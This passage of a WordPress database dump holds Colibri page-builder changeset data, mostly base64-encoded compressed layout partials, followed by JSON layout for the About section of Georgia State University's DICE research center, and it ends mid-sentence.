iXZgok7Ju6eonleXNe5+8rqi4+wXNlsUJinRPZ9PN71xq2KK68c1y1Hh4qzKL0J8CxKL8AuFk8-BVV3CNVxt7jVijwr7ZUXq+qm7--oxpvNG4JL7ETdziB2om7gDR0tG8CiXpaM-Xjqs5A36WRV5LPN1JWMME3qb4wwpr3bxhsvDqonmd2NBHYRQbZZPkVFOZluiiLKrrq8PpSKm6yxLV035WdvHR95JJrmy2WUOZjnxXI-105KZ4uSEdqrPPS20P5Ptq3l1+81KusX-J1+QZTLV15geO79UM33UoXHL21qXSKuf6FWv0IWyufETeOuwfXvsLxihbGzIriwqui29mjw0ksLmTSaO6jeLynuGKE8L9IvBpqVL644uq5MOiDtu7joLrKr-VX1zi7os-o4g7ZvYk5Smy0gcdHyzU7CZYeXqAUdOtJZQY0XtgWHfe0pn70cQpznmYO5XSbpi2-236soY4R-2KxsKZjnmYPnaI9TIh5XKJPXyqNcHyBMkyyCuCGAT3SrwgFFqO-DDWraq8OfT9pj388mF313MIumefN1bUeZfWh5tHzLcHXOcEYChQ3n8qSlqw6v-jvy+98gwpMY0sjOxveAeMMDE1I3BLtYPP1UvSEXtTq6U6nlgv2Pyf+F8yDmHyr8YiJMh-jTReMv3KrWtp0+lO000V1yn0sxiPHigxnfxXZSg5guxzVdDzHkDZPx6oNZzjuN9sNEXX8s29875I1V7o5rL22SQf0+6zLJFv6tp0ubZPtF8OfLzWwxjf3G1EG791rNXmnGfoVRJrPoyRaTpzRf1F+q5cH1xnaS3nZJ82ZUxUgxOsiQNPpeLbGq-3bj8lYVWJbQodrSfocjbQdvdvZv9t4dJS6jWWIZ4U-LJGu2NjpYff+ZEdpsxgh-OhDOkcTq+8-e0uK2HQ-dJUf0v0iOCDERYsw02Sk8nSkHX5sJ05ZjtBkqIUSXhBD-IgnBEcdMh0rdxWQgP-vQMpoltmRETNwx84kRzaLyT5evmqeSWfWtVUqfGVFqn6L0bGkyzbPDwsfnJJvlz+WuUhnnz76SKzZRBcsm2eG5RZHMfi+iefJ9JzJdMCJm-O2m5OxTGrkzwPeFJ3AfFLZg+7JHm82K3Ms7QD23aVlB9EEgYuKOI8mzuJd7OetNVLzsCm4fzRv+WOZPSRqd8ce+8IQ-Dgpb-ljFeRb1docM8E17Tw5G3p7apFk0t5vUtRJ2ZQuX2LR1ruqZzVPzIs-co788QUzcgX-5BJ04k5dVFkn-YgqqBobHfUldt3R2PodltHyKinZJ3eZ8jd1lOGLirnpw8l5VsxD4zgNxZGfRRcPqkFwyjNRohh02O2fYPM9ddHPEKPhwhu3HMm+WROm-CnOIXrRFViflBT3cCDqBjZvqcjKVkS2mdSfEqi-V0J6T2SJyj7aI2nOATzLwxWCLyAJvlmd2Ge368NcqI9FXZ4S2iCwj5PsBJJtF1ehXWeheVnsJ+5xuZ3kLAPUHQKcA0LUARH8A4hQA0QlAzUm6xeCfGSOsLr1eHYbdpdXLKOgqFJ1j0RGFuApF54CcQOEHqI4Bua9Gs+ujsR8PLwCg-gA6B6ITANEfQOcYdAIg+wOQpwDItwDUGJLlKi9cNGvqdXG0jB4rcvI4s84ekte6g98fTmonquzng31hDeVkoZ9hLhW1JpSj0t2MdFTSnD32hTt2dVJlo7Q5JbliE+2cuCnafK1aXj1uVmluZ+XjptiT0di5lb-Qfc-oflFuZsk0msyss9M8yyZZ5BjdP69g12XvKym7MNfS43wZ9Re9i---A9sN7PwVyQAA\"\n            },\n            \"partials\": {\n                \"25\": \"base64colibriH4sIAAAAAAACA+0923LbuJLfsg+oSh6AAhoAL48OstlJ1cxJ7cnUnK3z4oIoSOIJRTAkJNvz9fsAUryI1MWmHWfGD4lJXBt9Q6O7CaHwAwL4T2VzBID4DQo-IIBcb039DrCxBd4YvTQlAkCgEECySbNlaZo+8sNEt1zv07V2qR8dFAIoSltUk3P947iDdq7sdUiXh+b98cOPdY882djSN1rprDK+eKGTb7uiO5LdmzLTvaKtyXfd96WpEpMvde76MDiz7XXT5TrtodDZ3rh7ne3aZdLD6nZ56g7FxX13GWW63rjpMS4bZGGds9snQpKZ1VMAaYYp9HKZ5uuLscSejCb6ZPywpyKInsHMYYg0-9bDzENh16UuNg-d0jvTWS1AQFvwqvRP0206MiOo4-WJ7jpcqfNqZcvtoX5XFKZMdGUO-Vd6m2YPhwZfCpMjoF91Xh2aZGlufjFDuvQA8uIzBhCRfcw6Z8qvhU4GnHPZ8mh3rMRmjVpAAAgECj+4jdkaktjMlhURKPzY7VA57UxP7jd2b8rzZDo7E0Wh2usy1bmj7aTNvFuT7z7snLP5TeLSvXnOCTvTVrvFUP0t7P3XjV7au26hyfUiM7UWduWu1q+ZfjAHTd1sCYts18Il2w2kB2+5Xuh3XlDo4A+h4n0NrBwDFg818UIn39al3eXLafyU68U7kNJP0X14fyX1L5lsnBjXkHyWWSZQh4d6ZyaeP4viuXj9kokO6u1xsiNb2YFjylW7xW8m331O+ibUrEja2L0psVmtTOLwwpbLudjwhBJK89yUvw30wX92lUtXD8rmzuSt-l1l5h4bP31nCJ0npnK27PNXmnx7uMDEOs+Yz6MmP47hfvahn8iSHdLxCZCfg12O9Eln0r4tfs1crtR5Veiy5qixwS89cJR+p7qqT2Kz3bY9b1TuITMX8KfduT5a-Tj-SpduM2CXdr5V6n63HelpteAy1T3etou0D8ZFw2fmfl3jYAyNTxLIn2zB-ZUfHTvT3Jky11n-KLrva7bjCTO7tr11pGXZYeVWCPCw5dE5dqmdxkWmE7Ox2dKUuCjtPm1ldWq0a2Wi6eq1ent4Bok3rUXm5e9zv1p0q12qs6YeZEdY-mlWvpRHB6XWAeHgOvA23BgY4jQY-EowwnNggHoNuqDPuy8nFrMKRNUezc7LxEjjp4lFf8BrJaMqdNLxalWZrdeZ77LsBD8GrTjlS3PfO+gPODu8jnUFfaQEBfNKUPxzSNBgc-HE31UnPTpRQFgw7tRBII9OJ-PI4-Eu+DfYm08v+nnUUePAOK+Lhi2fpog6o12rhTa2TP+0udPZYZSr+nvqPK6vXa2qpDQmx4XOTdZThX0nwEH4LzW-jyia6Qe761HOfN-prMNEHWd9i5T-aRz0tWrcm9KlyXF52+Nznptyqtuw8hEEG6i4CxY6BRucgm12Y4+dsfbYleaeCB+5WbEz9h67crsSwWMB4WcAYVcCIi8FZGWte5OnHydPQ0YIzzBCcCUjxI-lyGBmjrzkSHYtwXSS2HLZ3fbGCXebVl9Wq0Tne121nkRX7swkHWDe5cvH2tP9iUYAoVfSQTwWEHoakPhKOPilcBxR886Wy6I0VfX7xmzNrzY5cvZ1QPdD9vkj0wuTHVr8Uk9KizLd6vIBAR1wU2rL1NXWL+sHkkcQEY0dytgoTq-FGTySdtGshzLBHgnGmU0OrjwbXrzZjgvOlHVyLRint9pxK9bZ4oM+u+s6W+CFvj7b5bU7n9uT8UUH5VBecEp+nJs+TWyOs7Ry03tHmtj817pFZyiXuqwd69fuEMOAUX81G+cKxG8QfELwaauLiqytXWeGJB2UuIfCfClM-ms7FEClt+Zfab7sUDe3n2yWNVFxb2YdIjrmvsVVqyUVAvrVaeftMarsLnflQ5vllGWfE5tXR4Zb2sYVAVY2d1jfmcpujV8G3uryW4fl+765-XrgrpkHfe4udc6Uz4u6d5TS9wgoA+7-F-Jp2Co2Nje4+r7TpXlZfL0Yu5mtTjMk6IPdlVXq+rM9Cmkm35vMFmcR1rEiBxaYuNK52kknO+tdhbPm4NWbJZyxt9iVxoPkP4Ur9cq9AZ5vb6hskuoMpw2rTm8P1amhBny80olZWPvtEvm-QLwR8LmkeIoDBguode5PC-+D3bndwvy08O-TrbGvEvpp1Rtcq3rhCtXL51e9MLPqfSwg-YlGAImuBOSxB0gWzXp0k+wyZ9CpTWljSjutlidS73uj-NId4VR2fzPVXzAP6JrtVtLn2WgLvTb4YOCOCuQZryhc6RUNHuuNgzNeUZBXCsLF8e2flguGGIzmxSCE0ZPcQCCu2GqupW40k4fqlG8pnVzPZTCGp9T+RRDs0p7erL6azCTuOC8-rX6xe1M2Ff3j42W+NtHJDXC91IDDLtSNmp9OYUgyXVX-6Gmjzodit00HqvN0q+v1eGTYovchCD0U9979AF-y3zpZCy02mtrf9SIz7rhWl+5m5Uz5D7s0kx89dLa2ymQmcZ0UA9KQSSGgpNBrg4eaBcCvLW3PMCfnSHZlaXL3Ob9puqlMV1VrLmbp0nzOP9q7vKNMytLk7svOner0Zec+2rt87LO7LOvMV6lMV5WZmJKu9NJ8zhHQDV5ndqEz7EqdV6lLbY6XaaUXnU1GZ1kXqvGhRwCjK700X3buwmmWu7IToJC0F5rsffnXBKSaykOIYIqn+1J5iEUObJU2njU+Tnhst7cnWi4QKC4RKB4gUDxEoHiEQPEYgRIUgRIMgRKAQAmOQAmBQEmKQAmJQIkAgRIhAiUiBErECJRkCJQEBEpyBEoKBEpKBEoGCJQMESgZIVAyRqACikBBGHXPFxu3bQM4iKtlukdAl9ppnNgsXZQpTpeIf0TygAD-iIAmma6qQ11PLmjlHjKDuTg8ZjbRGa51IS1sTePSZNqle1MPyv8bSZUjoAgo4uq-MMZ4WDgCYidtp+GDBixX7swB4tJm5lCz0HluyonV9BRYbQrQfmHDcM1aJW7aDVcMdc3IGk+stL-eDhU6efkN8D1sJHZb2Nzk7uIeAxLDJFIqk9Siu+l9Cjx8XeJVZu47uBnDyjQ+zmKlj5sJKPG6TJc4sbnTaV4TsKlaZbte3RlQRngv13uc23Krs8PMl41ygo8HdOCTdCjt3cTCFvbe9Be93jlnygqX9g5na0wHRdvlUREM3vdj-fZjPfcYWqIHI0Tnlwr-OeydYY3LmaW0dwho-RkUTnw2Is7WODG5F+dh3XY5XXeo0Fm6znHqzLbC2RpXrjQu2QwqtsuJira0wW5isyEVEpsNaZDYrEe9xGbH1POFIz33GK4nxaMJcposzdmdNo89nj7olw1ObIZzm5uW78JJRSzOKeJrID4luaKvZ0dzTo+Vs8-1G5f5zopXmbnHC12lVQc9t7dp3uiC4r4h+QYX9w2lN7i4xxQB3eM0z03ZtGle62bNK+0gdAyV8wjyjJz0DIOMseYdZtSj82GgghtCJE1Gc6dsj3WWrnMEtKUe1jtnD4JfmWzVUzud4q7G6RTXZTMgfUasXS4k8hyrdzXiYf3O3DucrbG-ocG-bpe91-p5RKdXTpduXKVPVTXltSxEI7IgR2UB6AabzGxN7uYj0eyEagbUCGhpWltmY7et3bwpzapj5XyoCXq7sVtzuyszJD+2bfGuMrjaWus2uEpKm2XjxvjlRD9gj6uq0PnIbpHZtb299ZFz2n293SCgmV1bXFcucZpnaW7wIrPJtw5dmwZHxPUVLQUPq69SZ269u1V+RFwh+FQVOveAIvik5xEkBJ+W6f6pquxpozy+-1N6zm4ZxJOWQYDbQ94mXRpcbZ-fSggeZyU0n8i9PkMhHsNsD6dvRsNTjQY-0N-VZggnuN5znaAjDBj+xLvzm-afT-sLNqn9o5c6F0aP0-hbk+9en7oXbAyVbyr+7Vx4pZAcO6yXpS2W9m7A+T33-YhPe+TogfXU8eOUmMaTjlf-QctouEpnGQK6wek6t6VpGizs8gF37wSiG11h23xEhV0dtaR+bNwNPtEN7iPiIHkwInnxX+AUOq7zp3G91WmPR3rns6JMc3dbI65D4e6XTD06m3ZSf8eSWWKduHRv6kvp6Fgxxs2Vk7R3QVOF-YUddF3aO7wq7bYvmECrjb27rTa2KNJ8fZvoshUA2vKpKdzmqLw5cD7ZNrh2B2N0Wja6n62fjug2fMzH4oP0pRn5mdi561rxKM3S5Bu2O1elS3NCKzldrk3LCwh4qy-uSl0UpsQDWnT6dSl2Wb+2lQ9qPowP0VQOhug7h4BfGpQ8DNzvsEzLOsjYNPT3wTYRtvkoA-Rgh+2qVsR8mkYDk-fvNHW-TRtiG7zR28WuXJsSL3bOHfalmfnplKpME5sPjI8WqDR5XpBO6-A0sTmu9q3XwufhHayndOk2iN8goIxSBBLxDwjoxt85Oyh-9kV0FIK-BZIuHhDQTzZ3COhNk0JO322cK6rDV0Erm7s6v5wkdvt+fmUyBmS1XyOge1NWXaFhpE3UuN9meYcW3Q+Z7u7uyB0ntlwj+ASUUgSfulSqu97cZ2n+7YIhWBzHCD755s0gHW2y0GUr7-vU3H2w953NDShFQJnkAQLKojggNOL8pQjeYLTQboOAtlD-1kDEhdgziL5TBBQCzGIEVEiHhURAWfxLIL5jCBBQioXELHaYxVjIPWYQfae+isVYSCckZvGGCRp99x0Q0HoUVw-755ZiyeCqCX+nCGgc0D8iDi83oRDRHxzo9RN2XfsIPhXabV5CZGomf1Y1OLdx9hKjzxe2OJPCdNYuGW4fbYf6WiPamg+dZ1zfHU836dIgoCtbJgbXL43N2d6RNGp9dqpfYAM-aWuzc06fVWbuuy6xo9ufmkWPJuKxH2Nov4DRfd4iaTF1yFnc4F2KzbZwD7hy2plr08NeiCkuzwobZH7BcebXsIiOZX7BWOYXnMj8EmPpfow-l2fwVXHbXy-lDI5TzoZFdCzlDMZSzmC+lLOfiBFmDGlkaxwcXrbLzgvrCGAwGepgs+TAPbuSE7OFO6AT7jg8Qz-cAf1wR-e1i9RRdP54rfZK2PuVAfADwvBNqlg-QjNS6ot+MJO8EkpdoRSeljDYL+juqM7cu+n99cn7cq0+xrJomfzxJvhPxytvKYs1Q02lLLIfnLP4eh0nrx2CHzP3S8-6cvO9xEwvM8dpH0ZjtrxkZORlohsXpYsMrq998XwRBs+aMHIUWd+afNfe2XvYAeRY+iOD12VivBIfzImckg6yZ84qqfMRX20CyN9djTZ3uP8sruDg9buCx76XYsGbK-jNFfzmCn4RV-D0N08s-ClcweEMruBJbf4cfuJ4FNdvfuK-rZ-4zdH75ld586v8jVKonmXcE0lUE5nZU8ecuvloStSXQd14ZlTTqp++N-PHCPON+Hf8jPK6Ppe2vrzd4Kqs+hLIwVVZwzTwZVoVmX7wCd+5zU0v3fv85KdajNdNlZ43TEGMJThvTGkvuj7N34VMR4NIx5-7HU5so+WDUKMcCzXClZkKJ++kO3tdXZ+s3TT+kBb3Prm--myK3yCgic6Sd7S4f98SfAx9hS61s+X5m+N8UnwfilWaZYjfIOCrYBWtNOIfXKnzamXLLeI3pXXamf97xyK6NOseIE9IoJ-McafNn0PTojSVKffmpipM4v6pXWr7nsMLL6lbI6C20EnqWnmj5Lo0+rEkeB5JIgCBkkBiSDBjJOAIlCAAGDhhEQIVYy6IBASKCcIjzGhdIWIcMxJxzDmREjMRER5g4q+xpIRxBIqFhEsEigEjUYhABYJEAoGCkBIR+MaMYUHqSgkYJBEcgWIswoKRCAtMJOCICIlJLDHjRDDMCERK0pBEHIESjAQCgRJSEoFAhcxP01-hv9uPgFo2OYQGdF5l2pl3FAGl7yf0WVrZzMcc+I1-No9OeR8jCUWgZEzCryIiNEKgGPW4CAgNEKiIE8GVFAQkAhUGJECgKALFYxJ1Hn+CpcYsIAKBEhFhCZaShAECJYmQOAw8WQEzxghEOCQRw5zQGIFiROCA0BCBAhIxHNcci0AxTmKOQEVEhggUSCIFAsUCEgoEinPCJAIFQHiMQDGOQHm8Ce7bCwQqlCTyrdhXL9VKxiREoDpvf-CAyAoHJAqxIBIDIyLCMaGBioMAgeIBkQECFYv6QUg-e3fdr4ZMXCH4tH6sKgqCp6qiMGQkkAgUp14phEFAGAIFEYkTLCVmkkQMxzGJBGYRZjwiQYAZJ2GgeRCRMEagDg+0+YdFTCKGQMWERolEoAj3ZBfCcxzjRDAEihGIdBR7xdX8bcZhvmEUIFBAQhXIwPONIAyBCqKISAQqCAlHoEIu6peExSSCRjAjzBhhgEAFQJjEAB5aIDFmHgpJogiD7xNjQQBUGEvPrzz0ijiMBJExAsUFAY5A9bH37+s+rbyY8+YRex4yz-xCgQAEinlp82qaCASKRcKXURIgUAwiBIp7qWQciL9LmcSeTrFX79IzS4BABZyEXR5AoOgfPCbR14Hi7KvVBCIiAgSqVhMyIpJjQiUCFUkSCMwCwnhGIoGJiBMZEMkx534IIZttkQiBQPn9sNnhCBdYEl7rlSjGjBIWeBJKwEwQHv0vDyPCRXMLdIuo103QOIw8W0JIhFBxzL3ocGg1Jg+I7L-9Qb-GcVDrZ0EgRKD6Iz1CNz6Hxhvfo+nXPq91+DARQAQOSYBA8YgwzAISIlCxIDHmjMQ9Xu-KQEvx76HXUkAC5hHkbxEnEpKQIlAsIjEgUAyACIYZIxAhUCwGAgxDRMITSpF5No0YjgmNEh6RCLAgwLwkBBEGz-VeyXrVFwaZJFIiUIzIOGFAYoFAcb+1Qv039NusCA87KxdESP-GESgpa2OSE-AiWIMeejXNKWEB5h7CgGPGPI8EQBhgoCQI1BHj1HxFO48Xy8zMzHXqW8TTh9mrr77u3CdU6OUyzdcnL46e63Luk0do+eoD2HIsgA3y8dGcC-3wbwHjuQPGVwVA5grQ1lc5HWK0vff6pWa06UAtBI8N1F4khMHr+9ZGxqNomDOG+oQby2e96vwv9E3KE0OMFzFreOrnR+rfPqs5JxhLh4QXuQ7yGe+Z23R+5u32tq8yAjqtQ2ZP9rgus3Isk1Kvm28RgDq9bsdgcyc5voVurjY-nj-U0n0f-ghb87NlmW5+GwwBLM1K77L2B7uXD7nepsnRr2tN-kzc-wO27ynsHKMAAA==\",\n                \"28\": \"base64colibriH4sIAAAAAAACA61YS3OjOBD+LXvoo6aUdmySY4I3tXvb2j3MMSWjBjQjJEoSfvz7PYB42NhjnKnyAfVL-X3dLZAheQfEH94aQITVGyTvgGhERd0asbQ1y60N5AARMAXErFRaOoo+6-crbp6yoNrQmAJi7WztxxsJk5XWtZJcaE+t3STQh7WBnO+DiBDcJIiSc7bJFpLtsnSdPSyGmFndVANCH06axslJ8hkZKUyY5Gybjs8oaON8VzKUY3E41cN+WeODrYYU+2W03gvddOZPnLdWjVGhjwC4HrjpfwsB1yenijIMmLXtdjCN1l2lhSMT-h4qgy8sf+5dlJF0bHVdmmpquh56RrighI6h8GVE9L+Ud9KkCzPha+jaZAvr7exGz+ONLlNeLcxj83pvHrPb4f0MLc7s5UGG8DZDT0vzSB7MY9ioUZPx9-+RpiyQvDhHlP-L7slNNbHhrySwBMqmD1ZREOOkoqXvxwk3G8C0hd8Wo20WTDishzEsQ6WHcV2lUu0BuRRBMDJip0nCagvrFBCDa6h9ihaZ1WrnFMtsVVtDJvS2LT5WCye0Fsd5NzXEbgmPVpkW3ve6WhTUvxG4DydNDDeb-lnbTGjWlYzX1qugrGGOtAhqH1Ne-Qnr1AByQA6r9A-GGDsXjsBfhxZfMvdAwt5qpIgvjXm05fAW4-0zK7TdCc18LTJlCkAuWa7pCMiFVoVhKlDlmS4YGXkmrOSMsJVELpMZLvFeLm8weoeqpfwKBaxwSrLMmiCUITdhZGePNNZdzeyXSdyo-lk5V1dr5uxhkmfRhEDOM2cPTBfs6UxUyQsRnq33c377Oc89w1EtX2ZquVpWy0W83S6kswdA-qPxQeUnllkTyASmC5aRaef5XFfJ67pecdb0PjgKWXnZ+POKQRppzKw+pzuz+pzszOpJmTKrL8vUCmc89wzvo3wR8bfpj1+LPD5OmrQ-Q8pIgGiC7deVnK67RWy0V9Z9VF6023OnWYD2-hl8vjKDIzC5piPbCa-8CPnnpzLxDKmPsWolq4+xWCWrjwwB+Z4pY8hFm7jszOJyPHSvcyw8PnRf7Ibf5DjXUgf2xDkgL9np7FyOLHezOpHtmdCqMIB8KE0XqJ1LTzpvB1m4MJVWck7aih4k84vM3N+r6yu92rVNwmfaZj3bNshLRpoqMl9E-Vuw3z50um+V4ITpYAitR1m-d2x9Dle79RZShLdXQA7J+4mEg2TbLrwKxIyoCJLtN0CeOhKBJCDPrQPkuSMC5I1vv4u+Wyf-ceQ9IBdGfgFeBCkAeRCuoOET8HOnhfnZF7d0lA-4Q6g9rN4APwA-OqiH+ltmq56DtJXCKgX8EC0pg-GUl1UK+CHV-vE+fdT-Ec9lPvda-9rulsW87lw6XveX4rP7mBam6C9LknLR6OFvCXkyolLZxaXw6sXzfy2tfvYMEwAA\",\n                \"122\": \"base64colibriH4sIAAAAAAACA+1bS3PjuBH+LTl0VfbAqVbLsq3jjOxJ5pCqrU1Sc5yCyBbZGxBgAJC2-n0OIEVKpmzJ5my8M6rSQXiy+0M30A8Abj4B0e-eGiCC+Ue4+QRERpXclokKWyWpNYFNACKgFRClhejMcTdo8enIOM9pkDg3rYCocrbywy8pkxbWxZqN0p5jv72JPq5t3X9aheD2ppBs11N1PW-u4ObuPFKdfTibvdTquuy582GreUhaxj5lkykT9ii2dWA3rIjzfJUsFMPqsK3676W1D7bsSdwVu96N0nXbfYGxU20k7CYAWvTQ7H602odwRpSkV-2CKccmfDlonw-bgyjddZidi2DBKhOTv-C9nh4xGT-GRhynffEibT5sNf-Gm1hNt7exeh-tA4F-IriDDvOPQPS1sECoHAPhA8P8854YTs78bJz567OZX07B-L8KBsIVm8AOCDfWAeGdeOVjxRezsa5UQVIPhEDXqqxg-gkIV7as6qCCWKM0EN5XknEpVtt8C4R-vfuyuv8FCFUAwr+xdbkoIPxnUIGB8N9GGnZewvYEuAM-htdgTeNY35yL9RKnwBrmqwrm9x8+fADCtROTeyAMNudQsANCnwqbID54IFQmA8LKqTRIEGvYeSDcOFsCYSYNO89AmNlSiYkTAWHGDWtbAWF6sD4lh8JmVttc2ANhKFQAwo1KRUu7KI49K5cWQCgGCH+t11pSIPw7Kx0KoNW+dPxDguQqnhOrHc2-sa+s8QyEv2pljJj8AxDefVndA+GDaA2EbNRaMxAGp4zXPZ0DGloS2RTKpOyBsLJVrdsPomMvWtik3HEfCgZClXXgSFmpNHggtBsgzFrKe3gz8aw8eyCsvZgcCDMVVJI5adgAoaoqZ1VacD-mENhgre5bQ+FsnRdAWLIyYvJNHdnNVc4lmwCEDxIKIFSpyriUFAhTq7VaW6eCdT7qV24bdiaOWAGhmKz2wW2HSBtrksrZjQQgrJQLhrvhsYO2qdKR5rI2EoT9B5ivgD5XML-vNW9xN77H3Dwv98-p7J-3hKUVEJWciRpOUdq17HNwhLKnXx-7FK32yQKiJY6c8s+c9bdvPusPt7nZi8u9OELL-AVa6Ozj7frVtNALtMzOpmXxejWY0o5GOt2WTuhiTf9Auj6bvSTUeLa2X-2Mm-sLMNPbYZ7WgRpQ9LIHNTt-y7+exoVSAQgzG10owsye5kedYNiPA3DEsp9dnQ3A7YSm-ddCNAOhmNSxag3KaJRqblh3hqjjfGDuHhixQytVfDTsVGnrzhCM862VcxI7tWayllICEKo0Ze8PZwPCcmCto2NvaxetaqW9BULNKuuG7SbJxFfKSYhOQ-QKhkZ49Aw+AOHXovNjMg7sSjGR-yNTtVRXjptoFYvJpJGsVnrg6MTBcSJfcSobSYGwaP2RPTasA0L2QUoVhtA78f-pkOfHyvra7cBuOA3WJWvrDO-5A6vYmV0QzwN6gLCsdZBKSyph283bum6Rut4nEw+Ejv9bi+PsqY-WuQ6do7PZcBqkYb099MxCwZ5jF+uCH-hTlbONZC2kDISGU-Zeue0BPNG3byHpSepdD7Gm92N8obQGQs+uYSBUsQkIxQR2G5UyEK45PDCbgds29K72ndfT3Y7l4tW23-7+PLKdLM-eIOavJmY5tSG6pNcDc7bRi6eYB0Qlhz3bqZvG786-OFW0oqNdHx3LGL+LgawYYokeSGQzAh+tlCgR8bCi5S0s+hO8CKUebsOZNJ0Tn1otayeJZDC-g8Wqh2KxAiIgTLXyftfow1ZzQrcIhPG-tqnSSYcfVtZLEGsSx1oFabidaH4Pi5UBQiCE+eovSZIkh5UjdKW2rKxhE3oKWmeho+9ZNmjXbdAS4+jj-BW9M4K7-0mu7VrpxFcqbQMgyUbzIxAqLblJJHDpE50naRckHNaX2Xj9rrIDdTEGKp0K6jPQntAUsT8CRpI7yZLUmqDEsNvDZm0fedh2lLIXiXhGDA7XdX50+Zx92CM0r0Ng5xNnHxKdJ3hQVWZPqg7Lzdi4Zmxkk+BgNa-HVnN+3mqehdzzS+nsAxD+Xvsgm22X8tqT2cO2odweto0KtM4THxyHtHiqAeMNfW2HY2r1Id6p1Ydop1Y-KTdj45qxkU2Cp0F+FvDPw995g9j93ZPS3X5SdACoOthducz2y22hk7SbpHUan8rbVdt0BrtnqOHVETUcsLPR-JislRc-4P3bNzHdPlI9dutWJNVjt1xFUj0mCIRNIsaw6-p0xbZbVxzq3c0oDq-XuzcKxEQDx6TqIZlhBGt7sDl3MO9skUFdkygtuQHCfm3aiaJqetabqMvKhf3aMhurjVWvBPONyJwhrYujh0Z7vgenTCsi0bAv+gDETrxux8RrMSpehEXCOmY03oTOJBg9vz+1jH77tr+VHOV3An4m5Oo7TFUsnqC0Y-ppOny+AvpcLN66NkCfM2lerwVvHX+CFl1PokXLMam6-nG16Ai-P74WXR3XovdwryLq7dVPoLc3R-U2Bpgx-hl43DvpXY56+zd-Im39bio-pQZfLr6cfvHlrWgTXu7OnHV3ZhLAX3H95s+4K79m5Hljzu39h8cklrPjMYnb7xqTuJ0gJlFLwmUVtokPKvCBbx0DFjQIWOz+037AgvYDFsMiDaEaBekSsHgxYPH-iTi8H+1+ud9zPcbbjtVOn5tZHs3NJPQOszNLGlPT5SU7M5I8xPefnlnORzOYeMnPXPIzU9tCV8dtodnsuxpDs9kfYw1Nl75ZXo3DdDGHLubQu1XwxTMKTt9XwWmyFOyEHs1iHImLDv-0OdjZfIr00XL0bs1s-sPmj44y-JOnYUev1P88udjZ1RuSOqOJ-dnVJaszfVbn8ubh1DcPU+Z1Ls8mTng2MRHgP9DLi0vG6b3HpIdlOnjltnuqoVV8Nzj-CEQZb1St+8dq2daoUtInL4qPP+T4H70P7IFLSAAA\"\n            }\n        },\n        \"type\": \"theme_mod\",\n        \"user_id\": 1,\n        \"date_modified_gmt\": \"2024-11-07 17:22:24\"\n    }\n}','','','trash','closed','closed','','77b2b8be-5716-4863-a2ab-a519306a9658','','','2024-11-07 12:22:25','2024-11-07 17:22:25','',0,'https://gsudice.dataconn.net/?p=1843',0,'customize_changeset','',0),(1844,1,'2024-11-07 12:22:25','2024-11-07 17:22:25','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c4\",\"parentId\":\"122-c3\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c4\",\"index\":0,\"id\":\"122-c5\",\"partialId\":122,\"styleRef\":288,\"type\":\"content\",\"props\":{\"content\":\"Who are we?\"}},{\"name\":\"hop-heading\",\"parentId\":\"122-c4\",\"index\":1,\"id\":\"122-c6\",\"partialId\":122,\"styleRef\":289,\"type\":\"content\",\"props\":{\"content\":\"The Center for Disaster Informatics &amp; Computational Epidemiology (DICE) at Georgia State University\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c4\",\"index\":2,\"id\":\"122-c7\",\"partialId\":122,\"styleRef\":290,\"type\":\"content\",\"props\":{\"content\":\"<p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit partners; and local communities.<\\/p>\"}}],\"styleRef\":287,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c8\",\"parentId\":\"122-c3\",\"partialId\":122,\"styleRef\":291,\"type\":\"content\"}],\"id\":\"122-c3\",\"parentId\":\"122-c2\",\"partialId\":122,\"styleRef\":286,\"type\":\"content\"}],\"id\":\"122-c2\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":285,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c11\",\"parentId\":\"122-c10\",\"partialId\":122,\"styleRef\":294,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c12\",\"parentId\":\"122-c10\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c12\",\"index\":0,\"id\":\"122-c13\",\"partialId\":122,\"styleRef\":296,\"type\":\"content\",\"props\":{\"content\":\"What do we do?\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c12\",\"index\":2,\"id\":\"122-c14\",\"partialId\":122,\"styleRef\":298,\"type\":\"content\",\"props\":{\"content\":\"<p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and 